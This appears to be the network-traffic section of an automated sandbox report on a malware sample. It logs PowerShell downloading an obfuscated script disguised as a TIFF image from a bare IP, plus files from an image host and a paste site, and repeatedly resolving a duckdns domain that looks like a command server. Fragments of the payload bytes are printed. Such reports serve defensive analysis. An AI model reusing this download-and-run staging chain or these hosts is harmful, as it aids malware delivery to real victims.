Dec 13, 2024 07:38:51.963633060 CET	1.1.1.1	192.168.2.6	0xc2f7	No error (0)	paste.ee		172.67.187.200	A (IP address)	IN (0x0001)	false
Dec 13, 2024 07:38:55.407963991 CET	1.1.1.1	192.168.2.6	0x89c1	No error (0)	newglobalfucntioninside.duckdns.org		107.173.143.10	A (IP address)	IN (0x0001)	false
Dec 13, 2024 07:39:57.390291929 CET	1.1.1.1	192.168.2.6	0x73e	No error (0)	newglobalfucntioninside.duckdns.org		107.173.143.10	A (IP address)	IN (0x0001)	false
Dec 13, 2024 07:40:58.521595955 CET	1.1.1.1	192.168.2.6	0xf3b2	No error (0)	newglobalfucntioninside.duckdns.org		107.173.143.10	A (IP address)	IN (0x0001)	false
Dec 13, 2024 07:41:58.771136045 CET	1.1.1.1	192.168.2.6	0x19f9	No error (0)	newglobalfucntioninside.duckdns.org		107.173.143.10	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

res.cloudinary.com

paste.ee

192.210.150.24

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49708	192.210.150.24	80	1488	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:38:25.283585072 CET	332	OUT	GET /55/creamykissinglipsgoodforcreamythingswithcreamicream.tIF HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 192.210.150.24 Connection: Keep-Alive
Dec 13, 2024 07:38:26.393687010 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 06:38:26 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25 Last-Modified: Thu, 12 Dec 2024 05:24:00 GMT ETag: "25930-6290bebf04a4e" Accept-Ranges: bytes Content-Length: 153904 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/tiff Data Raw: ff fe 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 57 00 4f 00 69 00 4b 00 74 00 47 00 43 00 65 00 4b 00 75 00 68 00 49 00 6b 00 69 00 41 00 20 00 3d 00 20 00 22 00 64 00 52 00 71 00 6e 00 64 00 72 00 57 00 6f 00 61 00 57 00 69 00 57 00 4b 00 7a 00 4f 00 22 00 0d 00 0a 00 50 00 78 00 6b 00 6d 00 68 00 41 00 73 00 42 00 74 00 4b 00 57 00 4b 00 49 00 4c 00 68 00 20 00 3d 00 20 00 22 00 4c 00 6b 00 68 00 65 00 49 00 51 00 55 00 57 00 57 00 41 00 65 00 51 00 7a 00 55 00 4b 00 22 00 0d 00 0a 00 63 00 41 00 4f 00 6b 00 4b 00 6a 00 78 00 6d 00 4c 00 4b 00 6d 00 6b 00 47 00 63 00 54 00 20 00 3d 00 20 00 22 00 65 00 5a 00 47 00 4b 00 55 00 6d 00 47 00 71 00 55 00 43 00 69 00 47 00 4b 00 61 00 69 00 22 00 0d 00 0a 00 0d 00 0a 00 69 00 4b 00 47 00 62 00 6a 00 66 00 53 00 70 00 5a 00 4c 00 57 00 4a 00 6a 00 70 00 6d 00 20 00 3d 00 20 00 22 00 47 00 63 00 61 00 57 00 4b 00 75 00 62 00 67 00 67 00 6e 00 47 00 4c 00 43 00 50 00 70 00 22 00 0d 00 0a 00 4f 00 73 00 66 00 4c 00 69 00 69 00 57 00 49 00 4c 00 75 00 [TRUNCATED] Data Ascii: WOiKtGCeKuhIkiA = "dRqndrWoaWiWKzO"PxkmhAsBtKWKILh = "LkheIQUWWAeQzUK"cAOkKjxmLKmkGcT = "eZGKUmGqUCiGKai"iKGbjfSpZLWJjpm = "GcaWKubggnGLCPp"OsfLiiWILuKcnkS = "UAcpidikKJWhhWm"efKqpiLfhKLAhcP = "mzWUhWZzotpBOWK"eIfeqoLBNZKNbdG = "JPWaGqCAGNHhpZk"kAxgnbiLnzGRcvS = "oBWCZNuGhpzcfHc"GkUzbLBfQzNpfLL = "bOiNpLUAhuKfGbc"WpeeijJiNLCakaG = "WqLpUPaiWKjWdNi"UaKrKWipOZxooBs = "zWAcLUrmzILemOU"GkPNGfzzaitOiLn = "qrLAkWUbLgbaiLG"ABjTfj
Dec 13, 2024 07:38:26.393726110 CET	1236	IN	Data Raw: 00 43 00 50 00 57 00 6c 00 68 00 75 00 73 00 61 00 55 00 20 00 3d 00 20 00 22 00 57 00 4c 00 50 00 62 00 55 00 68 00 4b 00 4b 00 69 00 4e 00 53 00 4c 00 41 00 55 00 48 00 22 00 0d 00 0a 00 6d 00 47 00 65 00 4b 00 66 00 64 00 74 00 64 00 48 00 63 Data Ascii: CPWlhusaU = "WLPbUhKKiNSLAUH"mGeKfdtdHcfzbnG = "LnLQofWPbmGjnKW"cTvmquGeCqdNKiW = "NeepLIoZqLUgpSR"ubRsJGsixWiesW
Dec 13, 2024 07:38:26.393735886 CET	1236	IN	Data Raw: 00 54 00 53 00 69 00 41 00 42 00 4e 00 22 00 0d 00 0a 00 50 00 7a 00 71 00 55 00 6e 00 55 00 61 00 4c 00 78 00 50 00 70 00 4b 00 6f 00 50 00 52 00 20 00 3d 00 20 00 22 00 69 00 43 00 50 00 6e 00 6b 00 43 00 70 00 75 00 62 00 65 00 6e 00 61 00 49 Data Ascii: TSiABN"PzqUnUaLxPpKoPR = "iCPnkCpubenaIaG"jUUerzcgjzpZITx = "AkPWxdeTWipocpc"SLOCfoZCWnicPPe = "PZKamBWLBLAOmhh"G
Dec 13, 2024 07:38:26.393851995 CET	672	IN	Data Raw: 00 57 00 70 00 20 00 3d 00 20 00 22 00 61 00 74 00 63 00 57 00 61 00 62 00 66 00 41 00 6c 00 55 00 68 00 71 00 4c 00 74 00 57 00 22 00 0d 00 0a 00 6b 00 5a 00 41 00 62 00 5a 00 7a 00 66 00 73 00 62 00 4e 00 4c 00 4c 00 57 00 71 00 7a 00 20 00 3d Data Ascii: Wp = "atcWabfAlUhqLtW"kZAbZzfsbNLLWqz = "eNCooLSUPTNnKKo"cGinobzkkWGzfLc = "bWJWiaUNLaCUcWd"zlLCcLccNJPcRoC = "uqAP
Dec 13, 2024 07:38:26.393862963 CET	1236	IN	Data Raw: 00 54 00 20 00 3d 00 20 00 22 00 5a 00 4e 00 6f 00 6e 00 4e 00 6f 00 78 00 6b 00 66 00 42 00 71 00 70 00 66 00 51 00 47 00 22 00 0d 00 0a 00 4e 00 52 00 78 00 47 00 57 00 41 00 62 00 66 00 4c 00 50 00 71 00 57 00 55 00 43 00 78 00 20 00 3d 00 20 Data Ascii: T = "ZNonNoxkfBqpfQG"NRxGWAbfLPqWUCx = "kuWmcLecqKlhCkK"LGKdKWqtxpkgLWc = "AKLdccozTutWUeR"CsLaCPPnhCckKjL = "cLiGL
Dec 13, 2024 07:38:26.393872976 CET	1236	IN	Data Raw: 00 4c 00 62 00 6b 00 70 00 43 00 6c 00 69 00 75 00 4c 00 49 00 47 00 65 00 65 00 6c 00 20 00 3d 00 20 00 22 00 6f 00 4c 00 6b 00 57 00 57 00 5a 00 47 00 69 00 7a 00 6d 00 57 00 4c 00 5a 00 69 00 62 00 22 00 0d 00 0a 00 75 00 62 00 6c 00 63 00 4c Data Ascii: LbkpCliuLIGeel = "oLkWWZGizmWLZib"ublcLRaKKGmRGhf = "mRzhOLkhmWpfaWa"RPZmiGKCOxnookf = "aeLevOmUWPWRepL"xUPLgnNoL
Dec 13, 2024 07:38:26.393883944 CET	1236	IN	Data Raw: 00 57 00 74 00 62 00 67 00 64 00 4b 00 69 00 49 00 42 00 47 00 69 00 22 00 0d 00 0a 00 6b 00 4c 00 6f 00 63 00 57 00 69 00 55 00 42 00 47 00 4e 00 64 00 75 00 41 00 55 00 4e 00 20 00 3d 00 20 00 22 00 4b 00 4f 00 57 00 41 00 63 00 7a 00 55 00 43 Data Ascii: WtbgdKiIBGi"kLocWiUBGNduAUN = "KOWAczUCLgLGWkW"AmmrNAmWGGBbLid = "GIKiUfLiAkiueUL"ZWzUiqNqrzOqGkL = "qiULaWleiWLGON
Dec 13, 2024 07:38:26.393896103 CET	1236	IN	Data Raw: 00 4c 00 4b 00 63 00 69 00 57 00 64 00 65 00 20 00 3d 00 20 00 22 00 75 00 4c 00 55 00 6f 00 52 00 6d 00 53 00 63 00 69 00 66 00 6b 00 53 00 67 00 72 00 74 00 22 00 0d 00 0a 00 50 00 57 00 69 00 4c 00 7a 00 6b 00 4b 00 55 00 75 00 69 00 4a 00 6b Data Ascii: LKciWde = "uLUoRmScifkSgrt"PWiLzkKUuiJkiAW = "iifLWWbNeAxioJK"hvWOoCNfzWLWThC = "nKZKPipKSWkkAIu"euzLiBfmmeklkzG =
Dec 13, 2024 07:38:26.394057035 CET	1236	IN	Data Raw: 00 70 00 41 00 22 00 0d 00 0a 00 57 00 47 00 55 00 4c 00 4a 00 6d 00 50 00 6f 00 4f 00 47 00 4c 00 5a 00 5a 00 4c 00 6e 00 20 00 3d 00 20 00 22 00 5a 00 6f 00 47 00 62 00 4a 00 61 00 4c 00 62 00 63 00 48 00 4f 00 6e 00 63 00 6d 00 57 00 22 00 0d Data Ascii: pA"WGULJmPoOGLZZLn = "ZoGbJaLbcHOncmW"ZeotceKQBQaAWWG = "bonKKLPpCAafUkG"NhOnhWWzmfucTcL = "NijcmGTjLkLLdqm"LUe
Dec 13, 2024 07:38:26.394095898 CET	1236	IN	Data Raw: 00 20 00 22 00 66 00 55 00 70 00 78 00 42 00 57 00 75 00 6e 00 4c 00 71 00 6d 00 74 00 41 00 4b 00 72 00 22 00 0d 00 0a 00 66 00 6c 00 51 00 4c 00 61 00 50 00 69 00 6c 00 76 00 68 00 47 00 6c 00 74 00 5a 00 57 00 20 00 3d 00 20 00 22 00 63 00 66 Data Ascii: "fUpxBWunLqmtAKr"flQLaPilvhGltZW = "cfdAauuPWUevrnk"LPcLzKWGbLWzLtW = "LRLWqfpcouRUbLW"rLWKNpWCBoBdNmt = "KoKpcvcL
Dec 13, 2024 07:38:26.513797998 CET	1236	IN	Data Raw: 00 62 00 71 00 64 00 47 00 4c 00 78 00 4c 00 4c 00 66 00 57 00 55 00 68 00 4b 00 20 00 3d 00 20 00 22 00 61 00 4c 00 61 00 69 00 62 00 47 00 64 00 53 00 64 00 57 00 76 00 6d 00 4c 00 69 00 5a 00 22 00 0d 00 0a 00 57 00 6d 00 4c 00 55 00 4c 00 43 Data Ascii: bqdGLxLLfWUhK = "aLaibGdSdWvmLiZ"WmLULCHKWKWWnoR = "KPUGzWZUAWhdoOR"KeoUpRKWLxzCdkx = "zbbmLWWWGZPLUjd"cKbuKARHlLqN

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49715	151.101.1.137	443	6556	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 06:38:32 UTC	127	OUT	GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1 Host: res.cloudinary.com Connection: Keep-Alive
2024-12-13 06:38:33 UTC	750	IN	HTTP/1.1 200 OK Connection: close Content-Length: 2230233 Content-Type: image/jpeg Etag: "7b9a6708dc7c92995f443d0b41dbc8d0" Last-Modified: Mon, 02 Dec 2024 10:22:29 GMT Date: Fri, 13 Dec 2024 06:38:33 GMT Strict-Transport-Security: max-age=604800 Cache-Control: public, no-transform, immutable, max-age=2592000 Server-Timing: cld-fastly;dur=2;cpu=1;start=2024-12-13T06:38:33.003Z;desc=hit,rtt;dur=169,content-info;desc="width=1920,height=1080,bytes=2230233,o=1,ef=(17)" Server: Cloudinary Timing-Allow-Origin: * Access-Control-Allow-Origin: * Accept-Ranges: bytes X-Content-Type-Options: nosniff Access-Control-Expose-Headers: Content-Length,ETag,Server-Timing,X-Content-Type-Options x-request-id: 6f487a4c60d72621f2efeecff85ca20a
2024-12-13 06:38:33 UTC	1378	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
2024-12-13 06:38:33 UTC	1378	IN	Data Raw: 77 24 91 80 f7 ed aa 38 13 c5 74 2e 92 f9 a4 19 c0 50 c1 95 13 cc f4 aa d7 4f e2 f4 f6 cf 9a 34 12 6a 34 d1 ac 34 c0 35 95 3d b3 e9 ff 00 b5 df 0d 9e 5f 16 d1 c2 37 3c 8c ae 62 55 46 b2 4b 70 2d 85 9e 48 cf 03 04 29 1a 02 c8 cb 27 e1 22 e8 8f 87 f3 c0 63 45 08 87 48 b1 94 0b b9 a8 91 99 9a b8 22 87 5d 10 0c cd 1b b7 a8 92 00 02 e8 d6 6a e9 8a 5b 07 65 52 c0 a8 46 37 fa 62 5a 9d 3c 47 59 18 29 b4 1d c3 d2 47 3f 4c 09 9f 4f a7 74 d3 90 78 2c c0 37 bf 3c 73 8a 10 92 a8 46 da b2 2c 8a a8 77 71 9b 83 4e 8f 0a 82 ab ed c1 ac ce 7f 04 8d 35 22 50 e5 08 6b aa b1 81 68 b5 2c ec eb e5 80 55 14 32 31 a5 53 75 63 e7 97 d6 cd 1e a2 6d 36 91 ee de 4f 55 76 14 79 07 0b 2b 22 ef 72 88 c0 2f a9 8a 8e 6b 31 f4 8c da ed 7c d2 10 5c 85 3b 2c d5 0a 23 a6 06 b8 8b 6f 90 b0 bc Data Ascii: w$8t.PO4j445=_7<bUFKp-H)'"cEH"]j[eRF7bZ<GY)G?LOtx,7<sF,wqN5"Pkh,U21Sucm6OUvy+"r/k1\|\;,#o
2024-12-13 06:38:33 UTC	1378	IN	Data Raw: 8c cd 80 06 22 88 00 fb 74 c5 c6 89 f4 fe 2d 26 ab ef 2f e5 b0 1e 8a 15 d3 03 7b ef a3 82 6d 4f 7c 20 f1 02 0b 6d 76 25 85 73 99 62 5f 34 d8 1c 7b e1 83 10 a3 8a b3 d7 01 8d 66 a0 49 0c 6a 5b 68 dc c7 75 e1 74 7a 92 cc 1f 71 de be 96 e6 f7 0f 7c c8 f1 3d 3b 6a 61 8e 38 e5 68 88 53 ea 51 cd e4 69 8b 69 b6 02 ec e5 68 59 ea 78 eb 81 ea 25 9c b2 90 2b 69 19 91 39 68 a6 8e 4d 96 a1 83 30 63 c6 30 9a 85 d8 ac 59 55 5b 81 67 92 71 2f 14 95 e6 85 a2 86 89 65 2a 6b b5 e0 6a 45 e2 ed 26 a4 45 1f aa 31 d4 a9 e0 1f 6c cd 97 c4 4b c9 2b 9e 77 31 20 fd 71 4d 32 2f 84 e8 00 6d cc e7 80 7b 9f 8e 27 14 ca fc 0f c3 cf 24 60 3a 67 91 e4 34 0b 1a be b9 07 54 77 8b e0 11 ef df 04 93 a2 2b 51 f5 1e 2b e1 99 7a 9d 2e ac 78 92 ce 35 2d f7 72 2b cb a1 5f 3c 0d 4d 46 b0 24 43 7b Data Ascii: "t-&/{mO\| mv%sb_4{fIj[hutzq\|=;ja8hSQiihYx%+i9hM0c0YU[gq/e*kjE&E1lK+w1 qM2/m{'$`:g4Tw+Q+z.x5-r+_<MF$C{
2024-12-13 06:38:33 UTC	1378	IN	Data Raw: 66 6d 4b f8 66 a7 61 05 96 26 b5 23 f1 70 73 f3 be ae 35 fb ac f2 15 01 99 ef 9e a3 9e d9 f5 ef 18 fb 5d a0 0b 26 92 09 a3 77 64 65 26 fe 07 fe bf ae 7c 9f 57 2c 6f e1 f2 21 70 ae ac 0d 7b e0 62 6c 20 6e 07 80 31 dd 33 bb 44 39 b3 7c 83 8a 79 8d b8 86 e0 1e 31 9d 15 14 65 07 a6 03 88 18 2d 95 5e 72 e2 32 ca 6d 45 1c ac a8 16 35 3b e8 8c a9 d4 24 41 44 8e 59 8f 4e 0e 01 3c b5 58 f6 8b 5a 3c 57 4c 80 be e2 fe 63 38 92 e0 90 f4 3a d6 5c be c4 0e ce 02 81 f9 e0 42 26 e0 56 94 1f 6c 23 82 aa 2d 54 0d c4 8f 8e 29 06 b5 25 76 51 e8 3d af be 32 1d 5c 6d 2c 09 1d f0 0f 13 72 3a 7d 71 b5 72 07 52 7e 03 33 d0 d6 da 3c f7 c6 44 6b d2 46 56 37 55 7d 0e 01 0c 8f 24 8a 63 ba f6 03 bf b6 3a 74 d3 3c 51 3c 60 33 49 b7 d3 e9 0c 2f a1 da 1b 77 36 39 34 39 1e f9 5d 14 f0 e9 Data Ascii: fmKfa&#ps5]&wde&\|W,o!p{bl n13D9\|y1e-^r2mE5;$ADYN<XZ<WLc8:\B&Vl#-T)%vQ=2\m,r:}qrR~3<DkFV7U}$c:t<Q<`3I/w6949]
2024-12-13 06:38:33 UTC	1378	IN	Data Raw: 02 f2 41 e0 62 ed a9 02 44 70 8a c0 0b 66 63 c8 f9 65 03 79 a4 21 b2 3a 71 db 03 2e c8 9c 24 7b 9a fa fc 06 07 ba 3a c5 79 3c b6 3b 59 7b 91 f8 be 58 b6 b4 02 37 6d e7 bf c7 25 cd 2d 06 2c 3f 17 06 b1 43 36 d6 28 cc d4 dc 82 47 4f ae 00 1d 03 03 e9 c0 ec 01 b6 ed e9 8e 05 3b 6a ab db e3 95 f2 8b 03 5c 0e f8 0b 30 55 21 42 96 63 d1 47 7c 22 e8 dc 95 79 9d ae ec 20 6e 07 cf 0e a8 ab ca a5 03 d0 e5 e2 47 67 a2 2e b0 07 20 26 43 e9 ed c7 1f d7 2a 51 c2 9b 5e b8 47 23 71 04 51 ca 16 24 71 80 22 18 70 16 b2 e8 8c 48 39 60 bc d0 be 7a d6 6a 78 57 86 2e b9 a5 56 b5 0a bf 89 7a 86 c0 48 0f 49 17 47 2b b5 98 10 1b 93 c0 cf 56 3c 0f 47 c3 04 90 81 41 bd 46 c9 ae bc 63 71 e8 74 b1 a8 03 4d 18 ae fb 45 fe 67 03 c2 18 66 d3 b5 14 60 4f 3e ae f9 74 0c ec 41 5c f7 6f a7 Data Ascii: AbDpfcey!:q.${:y<;Y{X7m%-,?C6(GO;j\0U!BcG\|"y nGg. &C*Q^G#qQ$q"pH9`zjxW.VzHIG+V<GAFcqtMEgf`O>tA\o
2024-12-13 06:38:33 UTC	1378	IN	Data Raw: f1 15 94 48 14 8d b6 ca df a7 03 e9 f1 cc df b0 9a 89 a3 d3 7d a7 48 0c aa 4f 84 33 7a 05 9a 12 c4 39 ae db 49 07 e1 78 6f b5 a3 56 df b4 cd 42 6a db 6c ad a8 85 db 71 e8 19 51 81 f8 0a 38 1e fb ed 9c ba 65 d2 cd f6 82 49 4c da 88 d8 68 f4 fb a3 2c b1 f9 91 ee 2f 67 f1 10 a1 80 1d 8b 03 db 3e 6f a5 7d 2b 49 12 ef 8d 83 7e 0e 3a 8a 24 9e 9c 1f 7f 9e 7b 5f da 44 2f a0 f0 ff 00 0d 48 24 46 1a ad 05 36 c4 5a 71 4a 40 aa e7 9a e7 3e 65 f7 7d 42 08 d6 35 7a f2 dd 94 dd 6d 62 bd 30 35 27 d2 46 65 8a 40 54 aa 93 60 8b fd 30 5e 46 98 ea 15 46 9d 41 55 2d c8 a1 f9 74 c4 92 09 9f 4c c3 d4 a4 44 a1 94 25 7a 87 23 a9 e4 f1 97 58 35 0d 34 6e c8 f4 ec 25 2c 79 da 45 d0 fc ab 03 61 20 d3 6d dd b1 16 bd 94 56 56 5d 3e 92 65 37 1a 5d 75 0b 99 9a 6d 43 a4 c1 0e 9a c9 dc 4b Data Ascii: H}HO3z9IxoVBjlqQ8eILh,/g>o}+I~:${_D/H$F6ZqJ@>e}B5zmb05'Fe@T`0^FFAU-tLD%z#X54n%,yEa mVV]>e7]umCK
2024-12-13 06:38:33 UTC	1378	IN	Data Raw: 0f 38 48 fe dc e9 54 9b 82 4d fd 58 12 28 e7 cf e7 79 21 87 cc 2e ca e0 72 a8 2f 13 89 e4 d5 5b c6 ee 48 fc 4a c2 b0 3d e6 a7 ed f6 98 ea 3f 79 a6 90 83 de c0 c9 3f 6c 74 82 88 d3 b8 53 ec dc e7 cf a5 47 2d be 6b bb a0 06 3f 04 cd 0a 82 f0 2c 8a dc 0d d8 1e b9 be da e9 18 d7 95 29 3d bd 57 94 7f b7 3a 54 50 7e eb 2b 3d 55 93 9e 6a 2d 56 9b 54 ac 53 49 12 95 34 48 26 ef 17 95 d7 cc 56 11 2f c4 73 c6 07 a8 9b ed f6 8a 14 2c 74 ce 1a ba 6e ac cb f0 9f b5 be 11 e1 d3 4b 20 4d 43 bc c7 73 6e 6b 0a 7d 80 ac cd 30 69 b5 3e 96 d2 a3 12 3f 10 ea 33 16 5f 04 d4 0d 63 46 8b 69 d4 37 41 81 bf e3 9f 6c e5 d4 f8 a4 53 78 74 af 0c 51 0d db 4d 90 cd ec 46 7a 78 be de e8 bc a5 59 f4 ec d2 6c 05 88 60 05 9f 60 73 c1 41 e0 b1 23 7e f8 b3 f1 cf 6a 39 a9 f7 7d 24 6a 0b a0 07 Data Ascii: 8HTMX(y!.r/[HJ=?y?ltSG-k?,)=W:TP~+=Uj-VTSI4H&V/s,tnK MCsnk}0i>?3_cFi7AlSxtQMFzxYl``sA#~j9}$j
2024-12-13 06:38:33 UTC	1378	IN	Data Raw: 93 c3 b9 dc ee 49 76 31 34 6a b8 dc 05 11 d7 8b bc 70 f8 b6 92 49 de 46 2e 1e 55 62 e4 a2 90 58 83 c9 1d f8 24 59 b3 de f3 0e 69 7c cd a2 ec 2a 95 51 55 42 c9 fa f5 38 17 95 15 a4 31 a2 aa b2 83 6b 1d 91 c5 d9 b2 7d b2 da 77 31 22 d4 65 b7 b1 50 7d c8 af ee 30 63 51 21 05 4b 02 0d d9 2a 09 e7 ad 1a b1 91 1c 92 aa 00 ad 41 4e e0 3d 8f 1f db 01 89 35 3b c0 20 15 db de f0 6f a9 56 75 76 dc 48 ed bb 8c 08 5b 4a 17 7d f9 ca 88 49 e2 f9 18 1a 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7 Data Ascii: Iv14jpIF.UbX$Yi\|QUB81k}w1"eP}0cQ!KAN=5; oVuvH[J}I#k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*
2024-12-13 06:38:33 UTC	1378	IN	Data Raw: 55 78 17 d8 df cf 2b 2c 4e 80 47 2a b5 05 dd 83 d3 29 55 65 55 65 1b 88 c0 d0 66 49 22 dc ae c1 81 be 17 8e 98 b8 77 8c 15 90 2d 6e ea 32 88 5e 32 40 1b ab 2a 25 32 69 64 0c c3 75 1f cc 74 c0 b4 00 44 43 48 3d 24 9e be d9 57 87 73 82 09 b3 d6 b1 53 aa 77 34 e4 5d 03 47 e5 93 f7 c4 14 49 da 40 2a 7e 3f 96 07 ad 79 e3 61 bd 4e d0 7b e4 95 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a Data Ascii: Ux+,NG)UeUefI"w-n2^2@%2idutDCH=$WsSw4]GI@~?yaN{E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk>BDoGJp+m+{
2024-12-13 06:38:33 UTC	1378	IN	Data Raw: 20 86 62 6f b7 53 95 e9 c1 c0 bc 8f be be 19 5d c4 8a ed 90 7e 1d 32 39 c0 90 48 37 9c 4d 9c e1 d7 9e 99 6a 5f 2e ef d5 7d 3e 18 10 8a 5d c2 8e a7 8c 69 34 c5 24 56 24 30 0d 46 b1 55 b1 ea 1d 46 31 16 a9 92 68 d9 85 aa 90 6b 01 c1 a3 1f 78 16 c0 03 ea 1c d1 c0 ea a1 47 d4 b2 c6 e2 c0 b3 63 fa e0 66 d4 34 f3 16 51 42 c9 03 28 ac 03 31 65 dc 4f 7f 6c 06 e7 83 7e 99 69 cb 32 f7 6e ff 00 2c 5a 39 4a c0 e9 cd 9e 38 cd 24 4f 37 40 10 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4 Data Ascii: boS]~29H7Mj_.}>]i4$V$0FUF1hkxGcf4QB(1eOl~i2n,Z9J8$O7@Gl:'6Xi50X~?G6OBwV)\|jXmsf9 `we!6q{PG\|$iar_LNb#

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49771	104.21.84.67	443	6556	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 06:38:53 UTC	67	OUT	GET /r/o8fzA/0 HTTP/1.1 Host: paste.ee Connection: Keep-Alive
2024-12-13 06:38:53 UTC	1290	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 06:38:53 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-Control: max-age=2592000 strict-transport-security: max-age=63072000 x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1; mode=block content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none' CF-Cache-Status: HIT Age: 38119 Last-Modified: Thu, 12 Dec 2024 20:03:34 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jymjEPefTGsWQP4BWiP76E59lmXZKJJc0ALrmnv0Oevga%2BGylOiF%2B6O98yHx3%2BV6bp4zM10%2FSQgs7%2B8poYGEzCzjXc0CftoG5MBmaJH3XuU5fdDG4jcqQZMXiA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f13f4302e2dc336-EWR alt-svc: h3=":443"; ma=86400
2024-12-13 06:38:53 UTC	215	IN	Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 34 38 36 26 6d 69 6e 5f 72 74 74 3d 31 34 38 33 26 72 74 74 5f 76 61 72 3d 35 36 33 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 37 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 36 26 72 65 63 76 5f 62 79 74 65 73 3d 36 38 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 39 32 39 39 34 30 26 63 77 6e 64 3d 32 34 34 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 63 61 37 66 38 66 38 63 32 35 64 35 36 34 32 37 26 74 73 3d 34 35 38 26 78 3d 30 22 0d 0a 0d 0a Data Ascii: server-timing: 